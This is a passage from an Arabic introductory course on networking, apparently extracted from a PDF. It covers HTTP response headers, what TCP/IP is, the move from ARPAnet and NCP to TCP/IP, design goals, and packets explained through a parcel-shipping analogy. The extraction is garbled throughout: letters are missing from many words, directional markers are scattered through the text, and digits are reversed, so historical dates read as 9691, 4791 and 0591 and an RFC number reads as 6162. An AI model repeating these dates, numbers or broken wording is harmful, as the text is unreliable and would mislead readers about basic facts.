3002:Content­Length‬‬ ‫‪   ><title/> MDMA­Multithreaded Daemon for Multimedia Access <title‬‬ ‫‪                                                                           ..‬‬ ‫‪ ..‬المحتويات الخري للملف‪                                                  ‬‬ ‫‪                                       ][Connection cloes by foruign host‬‬ ‫كما ھو الحال في رسالة الطلب‪ ،‬فان رسالة الستجابة يمكنھا ان تحتوي علي‪ ‬‬ ‫حقول ترويسات‪ ،‬وتبلغ ھ ذه الحقول برمجیات الزبون‪ ،‬بالطرق المسموحة‪      ،‬‬ ‫وتزودنا بمعلومات عن محتويات الرسالة ( مثل لغة المحتويات‪ ،‬وطول المحتويات‪،‬‬ ‫ونوع المحتويات )‪ ،‬وتعطي تفاصیل عن تواريخ التعديلت الخ ‪ ...‬وتساعد ھذه‪   ‬‬ ‫الترويسة المتصفح بتفسیر الملف او المورد بشكل صحیح‪ ،‬بحیث يتمكن‪       ‬‬ ‫المتصفح من عرضھا بشكل صحیح ‪                                        ...‬‬ ‫المزيد من ‪                                                           : HTTP‬‬ ‫يضاف بشكل دائم المزيد من الخیارات الي بروتوكول ‪ ،HTTP‬لتغطیة تبادلت‪    ‬‬ ‫مثل نصوص ‪ ,CGI‬والشؤون المنیة‪ ،‬فیضیف ‪ Secure­HTTP‬مثل آلیا تسمح‪     ‬‬ ‫بالتوقیع الرقمي والمزايا المنیة الخري ( لمزيد من المعلومات انظر في الموقع‪ ‬‬ ‫‪                                             ­www.commerce.net.8000/cgi‬‬ ‫‪                       bin/texit?/information/standards/drafts/shttp.txt‬‬ ‫وستستمر عملیات الضافة علي بروتوكول ‪ HTTP‬الساسي مع ازدياد الحاجة‪  ‬‬ ‫الي تبادلت اكثر تعقیدا‪ ،‬ومن المفید ان نلقي نظرة علي موقع ‪           3W‬‬ ‫‪ Organization Web www.w3.org‬لمعرفة آخر التطورات في ھذا المجال‪      ‬‬ ‫والي وثیقة ‪ RFC‬رقم ‪ 6162‬الخاص ببرتوكول ‪                        ...HTTP‬‬ ‫‪                                                http://rfc.net/rfc2616.html‬‬ ‫‪                                    38‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الول)‪                  ‬‬ ‫للكاتب‪                                                AgainstISR&USA :‬‬


‫تعريـــف عـام بال ‪                                                     TCP/IP‬‬ ‫محتويات الدرس‪                                                              :‬‬ ‫‪ -1‬ما ھو ال‪                                                            tcp ip‬‬ ‫‪ -2‬ممیزات ال‪                                                           tcp ip‬‬ ‫‪ -3‬اصل النترنت‪                                                               ‬‬ ‫‪ -4‬میلد ال‪                                                             tcp ip‬‬ ‫‪ -5‬اھداف تصمیم ال ‪                                                  tcp ip‬‬ ‫‪ -6‬حركة البیانات عبر الشبكة‪                                               ‬‬ ‫‪ -7‬لماذا نستخدم ال ‪                                                   tcp ip‬‬ ‫الدرس الول‪                                                                   ‬‬ ‫تعريف عام بال ‪                                                        TCP/IP‬‬ ‫يمكن لثنان من البشر ان يتصلوا ببعضھم عملیا عندما يوافقوا علي استخدام‪  ‬‬ ‫لغة محددة‪ .‬يمكن ان يتحدثوا العربیة‪ ,‬النجلیزية ‪,‬السبانیة ‪,‬الفرنسیة او اي لغة‬ ‫اخري ولكن يجب ان يستخدموا نفس اللغة‪                                  .‬‬ ‫اجھ زة الكمبیوتر تعمل بنفس الطريقة ‪       . Transmission Control Protocol‬‬ ‫(‪/Internet Protocol (TCP/IP‬ھ و اختصار المصطلح ‪ .‬يمثل لغة تتحدث بھا‪     ‬‬ ‫اجھزة الكمبیوتر‪                                                               .‬‬ ‫‪TCP/ IP‬ھو مجموعة من القواعد التي ًعرف كیف يتراسل اي كمبیوتران مع‪   ‬‬ ‫ت‪                                     ‬‬ ‫بعضھما ويتراسلن البیانات مع بعضھما ‪                                      .‬‬ ‫مجموعة القواعد ھذه تسمي ال بروتوكول ‪                                 .‬‬ ‫مجموعة البروتوكولت التي جمعت مع بعضھا البعض تشكل ‪ Protocol suite‬او‪ ‬‬ ‫‪Protocol stack‬ويعملون سويا فیما يسمي ‪ Protocol stack‬او حزمة البروتوكول‬ ‫‪                                                                              .‬‬ ‫‪                                     48‬‬ ‫‪ TCP/ IP‬يعتبر من البروتوكولت القوية ‪ ,‬السريعة ‪,‬القابلة للتطور ‪ ,‬ويعتبر‪        ‬‬ ‫مجموعة كفء من البروتوكولت‪                                                 .‬‬ ‫حزمة البروتوكول ‪Protocol stack‬ھذه ھ ي بروتوكول النترنت الشائع المستعمل‬ ‫الن‪                                                                          .‬‬ ‫نسبة لن تبادل المعلومات اصبح اكثر اتساعا ‪ ,‬كثیر من الفراد والشركات‪      ‬‬ ‫سیحتاجون الي فھم ال‪                                                TCP IP .‬‬ ‫ماھو ال‪                                                              TCP/ IP :‬‬ ‫‪TCP/IP‬ھو مجموعة من البروتوكولت التي تمكن الكمبیوترات من التصال‪     .‬‬ ‫في الحالة العادية وعندما ل تحتاج الكمبیوترات الي ان تتصل ببعضھا ل توجد‪   ‬‬ ‫حوجة نھائیا الي بروتوكولت متفق علیھا بین الجھزة‪                          .‬‬ ‫ولكن عندما تتصل الكمبیوترات ببعضھا في شبكة تظھ ر الحوجة الي برتوكولت‪ ‬‬ ‫يتفق علیھا‪                                                                   .‬‬ ‫يستطیع الیوم مدير اي شبكة كمبیوترات ان يختار من اكثر من بروتوكول ولكن‪  ‬‬ ‫بروتوكول ال ‪TCP/ IP‬ھ و الكثر استخداما ‪ .‬جزء من السبب ھو ببساطة ان‪     ‬‬ ‫ال ‪TCP IP‬ھو الذي تستعمله اكبر شبكة في العالم ال ‪INTERNET .‬اذا اردت‪  ‬‬ ‫ان يتصل جھ ازك مع النترنت يجب ان تستخدم ال‪                    TCP/ IP .‬‬ ‫عندما تعمل مجموعة من البروتوكولت مع بعضھا فان المجموعة بشكل‪         ‬‬ ‫جماعي تعرف ب‪                           Potocol Suite OR Protocol Stack .‬‬ ‫ال ‪ TCP/ IP‬مثال ل حزمة البروتوكول او ) ‪ Protocol Suite‬وصف ل مجموعة من‬ ‫البروتوكولت التي تعمل مع بعضھا‪                                            ( .‬‬ ‫يطلق علي ‪ TCP/ IP‬مصطلح ‪ Protocol suite‬او ‪ Protocol Stack‬وكل‪           ‬‬ ‫المصطلحین يستخدمان بصورة متبادلة اي يعطیان نفس المعني رغم انھما‪    ‬‬ ‫يختلفان بعض الشئ‪                                                           .‬‬ ‫سبب اخر ل شھرة ال ‪ TCP IP‬ھو انه يتوافق تقريبا مع اي كمبیوتر في العالم ‪.‬‬ ‫‪ TCP/ IP stack‬مدعوم من كل اصدارات انظمة التشغیل الكبري وانظمة تشغیل‬


‫الشبكات وتشمل ‪       : Windows 95\98 , Windows NT, Windows 0002,‬‬ ‫‪                    . Windows XP, Windows 2003 , Linux , Unix ,Netware‬‬ ‫‪TCP/ IP‬تسمي ايضا لغة النترنت‪                                              .‬‬ ‫‪                                       58‬‬ ‫وھي ايضا لغة لكثیر من الشبكات الصغیرة‪                                  .‬‬ ‫كل الكمبیوترات التي يلحق بھ ا النترنت لكي تتصل بفاعلیة يجب ان يتفقوا‪    ‬‬ ‫علي لغة ‪ .‬مثلھا مثل اي لغة بشر لھا قواعد حتي يستطیع الناس الذين‪       ‬‬ ‫يشتركون في المحادثة ان يفھ وا ماذا يقول الخرون‪                           .‬‬ ‫لغة الكمبیوتر تحتاج الي مجموعة من القواعد حتي تستطیع الكمبیوترات ان‪   ‬‬ ‫تتصل بفاعلیة ‪ .‬وبعض قواعد اللغة التي تستخدمھا الكمبیوترات للتصال‪       ‬‬ ‫تشتمل علي متي يتم ارسال البیانات ومتي يتم استقبالھا ‪                 .‬‬ ‫‪ -1‬ممیزات ال‪                                                       TCP IP :‬‬ ‫‪TCP/IP‬مستخدم لكثر من ‪ 02‬عاما‪                                        .‬‬ ‫‪ TCP/IP‬له كثیر من الممیزات والفوائد ‪ .‬وسندرس في ھذا القسم اكثرھا‪      ‬‬ ‫اھمیة‪                                                                      .‬‬ ‫‪ -1‬قابلیة التشغیل المتبادل‪                                                 :‬‬ ‫واحد من اكبر السباب التي جعلت ال ‪ TCP/IP suite‬يكتسب شعبیة وقبول‪   ‬‬ ‫عالمي ھ و انه يمكن تركیبه واستعماله بصورة عملیة علي اي نظام تشغیل ‪ .‬‬ ‫باستخدام ‪ TCP/IP‬يستطیع خادم ‪ Unix‬ان يتصل ويرسل البیانات الي خادم‪   ‬‬ ‫‪DOS‬او خادم‪                                                     Windows .‬‬ ‫الخادم ھو اسم اخر للكمبیوتر او الجھاز علي الشبكة ‪                        .‬‬ ‫ويمكن ان نقول ان ‪ TCP/IP‬الغي التضارب في التطبیقات المختلفة‪            .‬‬ ‫‪ -2‬المرونة‪                                                                 :‬‬ ‫‪ TCP/IP‬كتلة بروتوكول مرن جدا ‪ ,‬في الدروس القادمة سنعرف بعض الممیزات‬ ‫التي ادت الي ھذه المرونة‪                                                  .‬‬ ‫مثال لمرونة ‪ TCP/IP‬يتضمن ازالة المشقة التي يواجھھا المدير ‪Administrator‬‬ ‫في تخصیص واعادة تخصیص العناوين ‪                            Addresses .‬‬ ‫‪ -3‬سھولة الحركة‪                                                           :‬‬ ‫واحدة من قیود اكثر البروتوكولت ھي صعوبة نقل البیانات من احد قطاعات‪    ‬‬ ‫‪                                    68‬‬ ‫الشبكة الي قطاع اخر‪                                                  .‬‬ ‫‪ TCP/IP stack‬مصمم بصورة استثنائیة لینقل البیانات من اي قطاع في الشبكة‬ ‫الي القطاع الخر او من اي خادم في شبكة في جزء من العالم الي اي خادم‪ ‬‬ ‫اخر في شبكة في مكان اخر من العالم‪                                  .‬‬ ‫‪                                 78‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الثاني)‪                 ‬‬ ‫للكاتب‪                                               AgainstISR&USA :‬‬ ‫ھذا الدرس يھ دف بصفة خاصة الي التركیز علي نقطة ھامة وھي ان يستوعب‬ ‫الدارس ما الذي يدرسه وما حقیقته وھو اساس‪                              ‬‬ ‫مھم لتكون الدروس علي اساس افكار مسبقة قام علیھا موضوع الدراسة حتي‬ ‫ما يجي واحد يقول في النھاية ماھي قصة ال‪                               ‬‬ ‫‪TCP/IP‬ولماذا جاءت وھیك اسئلة وھي مرحب بھا ايضا ولكن لعامل الزمن‪    ‬‬ ‫نحب نتجاوزھا مسبقا ‪ ..‬وھذا تمھید للدخول الي الدرس الدسم ‪           ..‬‬ ‫والشغل الثقیل قااادم ‪ ..‬ارجو لكم التوفیق‪                                  ..‬‬ ‫‪ -3‬اصل النترنت‪                                                            :‬‬ ‫فھ م جذور واساسیات النترنت سیفتح بصیرتك امام تطور ‪ TCP/IP‬وكثیر من‪   ‬‬ ‫قواعده ومعايیره ‪                                                             .‬‬ ‫اذا عرفنا لماذا انشئ ال ‪ TCP/IP ,‬وكیف تطور ‪ ,‬يمكننا بسھولة ان نفھم ال‪   ‬‬ ‫‪                                                   . TCP/IP protocol suite‬‬ ‫اصل انترنت الیوم ھو ‪ ARPAnet ,‬وھ ي شبكة قوية انشئت بواسطة وكالة‪    ‬‬


‫ابحاث المشاريع المتطورة ‪      – Advanced Research Projects Agency - -‬‬ ‫اختصارا ( ‪ ( ARPA‬واطلقت في العام ‪ . 9691‬وھي تابعة لوزارة الدفاع المیركیة‬ ‫وتم انشاءھا في نھاية ‪                                              . 0591‬‬ ‫انشئت ھذه الشبكة لتكون مسئولة بصفة خاصة عن التھديد المحتمل من‪   ‬‬ ‫الھ جوم النووي من قبل التحاد السوفییتي‪                                  .‬‬ ‫واحدة من اھداف ‪ ARPA‬الساسیة ھي انشاء شبكة اساسیة تسمح لقادة‪  ‬‬ ‫القوات المیركیة بان يبقوا علي اتصال دائم في حالة وقوع الحرب النووية‪     .‬‬ ‫‪ARPA‬بدات مھمتھا بانشاء شبكة بما يبدو وكانھا متطلبات مستحیلة‪        .‬‬ ‫اللغة او البروتوكول الذي يستخدم في ‪ ARPAnet‬كان يسمي ‪       Network‬‬ ‫‪                                    88‬‬ ‫‪                                                  . ) Control Protocol ( NCP‬‬ ‫مع نمو ‪ ARPAnet‬ظھ رت الحوجة الي بروتوكول جديد لن ‪ NCP‬ببساطة ل‪      ‬‬ ‫يغطي كل احتیاجات الشبكة الكبیرة ‪                                        .‬‬ ‫يمكننا ان نشبه ال ‪ NCP‬بلغة انسانیة ل تحتوي ال علي كلمات قلیلة ‪ .‬اللغة‪  ‬‬ ‫يمكن ان تمكن قلیل من الناس للتصال ببعضھ م ‪ ,‬ولكن اذا دخل المزيد من‪    ‬‬ ‫البشر الذين يريدون ان يتحدثوا في كثیر من المواضیع يجب ان تطور لغة‪        ‬‬ ‫التخاطب‪                                                                   .‬‬ ‫اذا ‪ NCP‬لھ ا الكثیر من العیوب ولیست بالقوة الكافیة لشبكة قوية بدات في‪     ‬‬ ‫النمو خارج عن السیطرة‪                                                     .‬‬ ‫عیوب ال ‪ NCP‬ونمو ‪ ARPAnet‬قادا الي البحث عن تطوير لغة شبكة جديدة‪    .‬‬ ‫‪ -4‬میلد ال‪                                                         TCP/IP :‬‬ ‫في ‪ 4791‬اطلق اثنان من رواد النترنت ‪      A Protocol for Packet Network‬‬ ‫‪Interconnection .‬وھي ورقة تصف ال ) ‪    Transmission Control Protocol‬‬ ‫( ‪TCP‬وھو بروتوكول في ال ‪ Protocol suite‬وسیحل في النھاية محل‪   NCP .‬‬ ‫وكما سندرس في الحلقات الدراسیة القادمة ‪ TCP‬مسؤول من التاكد ان‪       ‬‬ ‫البیانات وصلت الي الكمبیوتر الخر ‪                                          .‬‬ ‫في ‪ 8791‬الختبار والتطوير المتزايد لھذه اللغة قاد الي حزمة جديدة من‪       ‬‬ ‫البروتوكولت سمیت ) ‪   Transmission Control Protocol/Internet Protocol‬‬ ‫‪                                                                 . ) TCP/IP‬‬ ‫في ‪ 2891‬قرر بان يستبدل ‪ NCP‬بال ‪ TCP/IP‬ك لغة اساسیة ل‪     ARPAnet .‬‬ ‫في ‪  ARPAnet 0991‬ازيلت من الوجود ‪ .‬النترنت من ذلك الحین نمت من جذور‬ ‫ال ‪ ARPAnet ,‬وطور ال ‪ TCP/IP‬لیقابل متطلبات التغیر للنترنت ‪               .‬‬ ‫‪ -5‬اھداف تصمیم ال‪                                                 TCP/IP :‬‬ ‫‪ TCP/IP‬تطور الي وضعیته الحالیة ‪ ,‬والبروتوكولت الداخلة في ‪ TCP/IP suite‬تم‬ ‫اختبارھا و تعديلھا وتطويرھا مع الوقت ‪ . TCP/IP protocol suite‬له عدة اھداف‬ ‫‪                                     98‬‬ ‫تصمیم لیكون بروتوكول فعال ل شبكة كبیرة ومتطورة‪                           .‬‬ ‫بعض من ھذه الھداف يشمل‪                                                   :‬‬ ‫‪ -1‬الستقللیة عن نوع الجھزة‪                                                  :‬‬ ‫حزمة بروتوكول يمكن استخدامھا علي ال ‪Mac ,PC, mainframe,‬او اي جھاز‪   ‬‬ ‫كمبیوتر‪                                                                              .‬‬ ‫‪ -2‬الستقللیة عن نوع البرمجة‪                                                  :‬‬ ‫حزمة بروتوكول يمكن ان يستخدمھ ا مختلف مصنعي البرمجیات والتطبیقات ‪    .‬‬ ‫وھذا يسمح لجھاز في موقع بالتصال بجھ از في موقع اخر بدون ان يكون فیھما‪ ‬‬ ‫نفس البرنامج‪                                                                        .‬‬ ‫‪ -3‬اصلح الخطا والقدرة علي حمل نسب خطا عالیة‪                            :‬‬ ‫حزمة البروتوكول متمیزة ب اصلح اوتوماتیكي لي بیانات ساقطة او مفقودة ‪   .‬‬ ‫ھ ذا البروتوكول يستطیع اصلح اي انقطاع من اي جھ از في اي جزء من الشبكة‬ ‫وفي اي نقطة في البیانات المرسلة‪                                             .‬‬ ‫‪ -4‬نظام كفؤ بتحمیل اقل‪                                                        :‬‬


‫حزمة البروتوكول تحمل كمیة قلیلة من البیانات الضافیة المتحركة مع البیانات‪  ‬‬ ‫المرسلة ‪ .‬ھ ذه البیانات القلیلة تسمي التحمیل الزائد ‪ .‬التحمیل الزائد‪          ‬‬ ‫‪Overhead‬يشبه ظرف استخدم ل ارسال رسالة ‪ ,‬او صندوق استخدم لرسال‬ ‫اشیاء كبیرة وملت باكثر من حمولتھا العادية‪                                    .‬‬ ‫‪ -5‬القدرة علي اضافة شبكات علي الشبكة الداخلیة بدون عرقلة الخدمة او‪     ‬‬ ‫اسقاط الشبكة الداخلیة‪                                                         .‬‬ ‫‪ -6‬حزمة البروتوكول التي فیھا البیانات يمكن ان تشق طريقھا خلل شبكة‪      ‬‬ ‫الكمبیوترات الداخلیة الي اي اتجاه محتمل ‪ .‬لیكون ھذا ممكنا مخطط عنونة‪     ‬‬ ‫وحید وذو مغزي يجب ان يستعمل لذلك اي كمبیوتر يحرك البیانات يمكنه ان‪     ‬‬ ‫يحسب افضل طريق ل كل قطعة بیانات كما تتحرك داخل الشبكة‪               .‬‬ ‫‪TCP/IP‬تم تطويره لیقابل ھذه الھداف ‪ ,‬وخلل دراستنا سنعرف ھل غطي‪     ‬‬ ‫بالفعل اھ داف تصمیمه ام ل‪                                                     .‬‬ ‫مصطلحات ھ امــــــــــــــــة‪                                                      :‬‬ ‫‪                                                                            Protocols‬‬ ‫مجموعة من القواعد والمعايیر التي تحكم التصالت‪                             .‬‬ ‫‪                                        09‬‬ ‫‪                                             Network administrator‬‬ ‫الشخص الذي يركب ويراقب ويحل مشاكل الشبكة‪                   .‬‬ ‫‪                                                                Host‬‬ ‫اي جھاز مثل ( ‪( workstation , server, mainframe, printer‬في شبكة او‬ ‫شبكة داخلیة فیھا عنوان‪                                     TCP/IP .‬‬ ‫‪                                                            ARPAnet‬‬ ‫شبكة وكالة ابحاث المشاريع المتطورة ‪ ,‬سلف النترنت ‪               .‬‬ ‫‪                                     Network Control Protocol NCP‬‬ ‫البروتوكول المستخدم قبل‪                                    TCP/IP .‬‬ ‫‪                                 Transmission Control Protocol (TCP‬‬ ‫البروتوكول الذي يصف التصال بین الجھزة‪                             .‬‬ ‫‪         Transmission Control Protocol/ Internet Protocol( TCP/IP‬‬ ‫حزمة من البروتوكولت اشتركت لتكون لغة النترنت‪                    .‬‬ ‫‪                               19‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الثالث)‪                    ‬‬ ‫للكاتب‪                                                    AgainstISR&USA :‬‬ ‫ما ھي البروتوكولت‪                                                             :‬‬ ‫البروتوكول ھو قاعدة او مجموعة من القواعد والمعايیر للتصال تستخدمھا‪       ‬‬ ‫الكمبیوترات عندما ترسل البیانات ذھابا وايابا‪                                   .‬‬ ‫كل الراسل والمستقبل المشتركان في البیانات المرسلة يجب ان يعترفوا‪       ‬‬ ‫بنفس البروتوكولت‪                                                               .‬‬ ‫لتبادل البیانات ‪ ,‬الكمبیوترات المرسلة والمستقبلة ‪ ,‬وتسمي ايضا ‪      Hosts ,‬‬ ‫يجب ان يوافقا علي شكل البیانات‪ .‬عندما يرسل ‪ Host‬الي ‪ Host‬اخر كل باقة‪  ‬‬ ‫ال ‪s 1‬وال ‪s 0‬كلھما يجب ان يوافقا علي معني وطريقةالتنسیب لي ‪ 1‬و ‪  . 0‬‬ ‫جزء من المعلومات التي ترسل تمثل العناوين وجزء يمثل البیانات‪               .‬‬ ‫كل ‪ HOST‬له عنوان خاص ‪ ,‬مثلما لبیتكم عنوان خاص في شارعكم ‪ .‬وتشبه‪   ‬‬ ‫ايضا خطابات البريد التي ترسل الي عنوانك ‪ .‬البیانات التي تسلم الي ال ‪Host‬‬ ‫المناسب تعتمد علي عنوانه ‪ .‬ال ‪ Host‬التي ترسل المعلومات يجب ان تفھم‪   ‬‬ ‫كیف تجد العنوان الصحیح بین البیانات ‪ Data‬لكي تستطیع البیانات ان تجد‪      ‬‬ ‫طريقھا الي وجھتھا‪                                                              .‬‬ ‫كما ذكرنا سابقا عندما تبدا الكبیوترات في التصال ‪ ,‬يجب اول ان يتفقوا علي‪   ‬‬ ‫بروتوكول لیستخدموه ‪                                                           .‬‬ ‫مجموعة البروتوكولت تسمي ‪ protocol suite‬او ‪ protocol stack .‬عناوين‪       ‬‬ ‫البروتوكول الواحد لھا اصدار خاص يساعدھ ا في التصال ‪ .‬عندما ندمج‪           ‬‬


‫البروتوكول مع بروتوكولت اخري ‪ ,‬مجموع البروتوكولت الناتجة تسمي ‪protocol‬‬ ‫‪suite . TCP/IP‬كمثال ھو ‪ protocol suite .‬في كمبیوتر متصل مع الشبكة ‪    ,‬‬ ‫البرنامج الذي يجمع البیانات للرسال يسمي ‪ protocol stack .‬عندما الكمبیوتر‬ ‫البیانات ‪ ,‬فانھ ا تتحرك من خلل ال‪                              protocol stack .‬‬ ‫ھ ناك الكثیر من البروتوكولت المستخدمة الیوم ‪ .‬بعضا منھا بروتوكولت مملوكة‪ ‬‬ ‫‪                                         29‬‬ ‫ذات استخدام خاص ‪ .‬طورت لھداف محددة لتقابل حاجات خاصة لبعض ال‪    ‬‬ ‫‪software‬او‪                                                         hardware .‬‬ ‫واحدة من اشھر ال ‪ protocol suites‬الیوم في اتصالت الشبكات تشمل‪      :‬‬ ‫‪                                                                 : 1/ IPX/SPX‬‬ ‫ھو ‪ protocol suite‬قامت بتصمیمه شركة ‪ Novell‬واستخدمته في انظمة‪      ‬‬ ‫تشغیلھا‪                                                                       .‬‬ ‫‪IPX/SPX‬اختصار ل ‪ Internetwork Packet Exchange / Sequenced Packet‬‬ ‫‪                                                                     Exchange‬‬ ‫‪                                                                : 2/ Apple Talk‬‬ ‫ھو ‪ protocol suite‬قامت بتصمیمه شركة ‪ Apple‬واستخدمته في انظمة‪      ‬‬ ‫تشغیلھا ‪                                                                      .‬‬ ‫‪                                                                    : 3/ TCP/IP‬‬ ‫ھو ‪ protocol suite‬واصبح معیار النترنت ‪ .‬يعني اي واحد يريد ان يستخدم‪    ‬‬ ‫النترنت لزم يستخدم بروتوكول ال‪                             TCP/IP suite .‬‬ ‫طیب ندخل في العمق شوية‪                                                 ..‬‬ ‫البروتوكولت تحرك حزم البیانات ‪                                               :‬‬ ‫عندما ترسل البیانات من ‪ Host‬الي اخر يقوم بروتوكول ‪ TCP/IP‬بتقسیمھا الي‬ ‫قطع تسھل ادارتھا وھذه القطع تسمي ‪ packets‬الرزم او الحزم‪               .‬‬ ‫البروتوكول يحدد كیف سیكون شكل وعنوان ال ‪ packets .‬ال ‪ packets‬مثل‪    ‬‬ ‫الصناديق تستخدم لشحن ال ‪ Data‬او البیانات‪                                .‬‬ ‫كل ‪ packet‬مرفق معھا ‪ headers‬وھي معلومات الحزمة التي ترفق معھا‪      ‬‬ ‫للدللة علیھ ا ‪ .‬والتي تجعل من الممكن اعادة تجمیع ال ‪ Packets‬واخذ البیانات‬ ‫الصلیة في وجھة البیانات ‪                                                    .‬‬ ‫ال ‪ Headers‬او معلومات الحزمة يرفق مع حزمة البیانات لنفس السبب الذي‪  ‬‬ ‫يلصق لجله الديباجة علي الطرد المرسل عبر البريد الي شخص اخر ‪         .‬‬ ‫‪                                      39‬‬ ‫الكمبیوتر الذي يرسل البیانات الي كمبیوتر اخر ھو مثلي عندما ارسل طرد الي‪ ‬‬ ‫انسان اخر ‪                                                                   .‬‬ ‫سنضرب مثا ل عملي يوضح المسالة‪                                           :‬‬ ‫اذا انا عاوز ارسل دراجة لبن اختي في مدينة اخري ‪ .‬الدراجة تمثل عندنا‪        ‬‬ ‫البیانات التي نريد ان نرسلھ ا الي كمبیوتر اخر ‪ .‬لرسل الدراجة يجب ان اتبع‪     ‬‬ ‫قواعد وبروتوكولت معینة حتي تصل الدراجة‪                                    .‬‬ ‫‪ -1‬اضع الدراجة في طرد او عدة طرود اذا كانت ل يمكن ان توضع علي طرد‪      ‬‬ ‫واحد ‪ ,‬في ھ ذا المثال الطرد يمثل ال ‪                                 packets .‬‬ ‫‪ -2‬وضعنا الدراجة داخل الطرود ‪ ,‬الخطوة التالیة ھي وضع عنوان علي الطرود ‪  .‬‬ ‫ولكن ھ ناك بروتوكولت وقوانین لوضع العناوين علي الطرود ‪ :‬يجب ان استخدم‪  ‬‬ ‫اسم اختي الصحیح وكذلك عنوانھ ا الصحیح ‪ .‬عنوان الديباجة يجب ان يحتوي‪    ‬‬ ‫علي اجزاء المعلومات الضرورية حتي تصل الطرود الي وجھتھا الصحیحة مثل ‪  ,‬‬ ‫عنوان الشارع ‪ ,‬المدينة ‪ ,‬المحافظة او القلیم ‪ ,‬مفتاح المدينة ‪ .‬وھذا يشبه‪      ‬‬ ‫تماما ‪ TCP/IP‬عندما يضع معلومات الحزمة ‪ Headers‬علي حزمة البیانات‪          ‬‬ ‫‪packets‬التي سترسل‪                                                        .‬‬ ‫‪ -3‬كذلك نضع عنوان المرسل علي الديباجة وھذا يشبه ايضا حزمة البیانات‪      ‬‬ ‫التي تحتوي علي معلومات المصدر المرسلة منه ‪                              .‬‬ ‫‪-4‬ھناك مكان محدد لكل معلومات العنونة ھذه ويجب ان امل البیانات لكل طرد‪  ‬‬


‫وال لن تصل الي وجھتھا ‪                                                      .‬‬ ‫‪ -5‬اخیرا اشیر الي اي واحد من الطرود مطلوب ان يفتح بالكتابة علیھا ( ‪1‬من ‪)5‬‬ ‫(‪2‬من ‪( 5‬الخ ‪. ..‬وھذا يساعد اختي لتعرف اي طرد تفتح الول ‪ ,‬ثم الثاني ‪ ,‬الخ‪ ‬‬ ‫‪ ..‬فتستطیع بسھولة اعادة تجمیع الدراجة ‪                                     .‬‬ ‫‪-6‬عندما تكون الطرود جاھزة ‪ ,‬محتاج ان اقرر اي نوع خدمة استلم اريد ان‪       ‬‬ ‫استعمل وصیغ ديباجات الطرود تعتمد علي خدمة الرسائل او نوع الشركة التي‪ ‬‬ ‫اخترتھ ا مثل ‪ :‬اذا اخترت ال ‪ DHL‬ح اضع الطرود في صناديق ال ‪ DHL ,‬اذا‪         ‬‬ ‫اخترت ال ‪ ARAMEX EXPRESS‬بالتاكید ح اضع صناديقي في الرامكس وھكذا ‪ .‬‬ ‫نفس الشي يحدث في عالم الكمبیوتر يتم تغلیف ال ‪ packets‬ب ‪ format‬او‪     ‬‬ ‫صیغ تكون مناسبة للشبكة الفیزيائیة الموجود داخلھا الكمبیوتر المرسل ‪ .‬اذا‪    ‬‬ ‫‪                                        49‬‬ ‫كان الكمبیوتر علي ‪ Ethernet network‬او شبكة ‪ Ethernet‬الحزم يجب ان تكون‬ ‫علي الصیغة المناسبة للنتقال عبر ال ‪ Ethernet work .‬اذا كانت الحزم علي‪ ‬‬ ‫‪Token Ring network‬او شبكة ‪ Token Ring‬الحزم مفروض تكون علي صیغ‪   ‬‬ ‫‪                                                               . Token Ring‬‬ ‫‪ -7‬الن وصلنا الي مرحلة التسلیم ‪ ,‬اتصلت برجل البريد لیاتي وياخذ الطرود‪     ‬‬ ‫ولكن ل انا ول ھ و سیكون من سلم الطرد !!! لماذا اذن ‪ ..‬سنعرف الن ‪       ..‬‬ ‫البیانات المكتوبة بالصیغة المناسبة في نظام نقل متحرك من ماكن الي اخر‪   ,‬‬ ‫الطرود يحتمل ان تاخذ طرق مختلفة لكنھا في النھاية ستصل الي نفس‪       ‬‬ ‫الوجھة ‪ .‬سیتم تسلیمھم الي عنوانھم اعتمادا علي العنوان الذي وضعته علي‬ ‫الديباجات ‪ .‬بنفس الفھم اذا كانت ھ ناك مشكلة الشركة ستخبرني لني‪       ‬‬ ‫وضعت عنوان المرسل علي الطرود‪                                          .‬‬ ‫‪ -8‬بعد ان تصل الطرود الي اختي ستفتحھم ‪ ,‬وتستطیع ان تعید تجمیع الدراجة‬ ‫بناء علي المعلومات التي علي الديباجات ‪ .‬بالمثل الكمبیوتر المستقبل لحزم‪  ‬‬ ‫البیانات يمكن ان يجمع البیانات بناء علي المعلومات المرفقة مع الحزم وھي ال‬ ‫‪                                                                 . Headers‬‬ ‫‪ -9‬اخیرا سترمي صناديق الطرود بعد ان تاخذ المعلومات التي تريدھا من‪       ‬‬ ‫الديباجات ‪ ,‬والذي تريده حقیقة ھو الدراجة والصناديق كل مھمتھا ان توصل‪     ‬‬ ‫الدراجة الي وجھتھ ا الصحیحة اذن لحوجة للصناديق بعد نھاية مھمتھا ‪ .‬نفس‪ ‬‬ ‫الفكرة تستخدم عندما نستخدم ال ‪ TCP/IP‬لكي نرسل البیانات ‪ ,‬الحزم تكون‪ ‬‬ ‫مبنیة علي معلومات مرفقة معھ ا ‪ ,‬وتنبذ بعد ان تستخدم المعلومات الھامة‪     ‬‬ ‫المرفقة وتم تسلیم البیانات المطلوبة الي البرنامج الذي طلبھا ‪               .‬‬ ‫الصورة ادناه تصف كمبیوتر احمد وھ و يرسل بیانات الي كمبیوتر سارة ‪ .‬لحظ ان‬ ‫البیانات تم تجزيئھا الي عدة حزم يحتوي كل منھا علي رقم متسلسل ‪ .‬في‪  ‬‬ ‫الكمبیوتر المستقبل سارة تعید تجمیع البیانات مرة اخري الي صیغة غیر مجزاة‬ ‫‪ .‬يعني تتجمع في صورتھا الصلیة التي ارسلت بھا‪                           .‬‬ ‫‪                                      59‬‬ ‫مصطلحات ھ امــــــــــــــــــة‪                                           :‬‬ ‫‪                                                               protocol suite‬‬ ‫مجموعة من البروتوكولت‪                                               ‬‬ ‫‪                                                              protocol stack‬‬ ‫مجموعة بروتوكولت ترسل وتستقبل البیانات‪                            ‬‬ ‫‪                                                                    Headers‬‬ ‫معلومات صغیرة تكون مرفقة مع الحزم وتحتوي دائما علي العنوان ومعلومات‬ ‫مسار البیانات‪                                                                ‬‬ ‫‪                                69‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الرابع)‪                  ‬‬ ‫للكاتب‪                                                AgainstISR&USA :‬‬ ‫النموذج القیاسي للشبكات‪                                                      ‬‬ ‫‪                                                Open System Interconnection‬‬


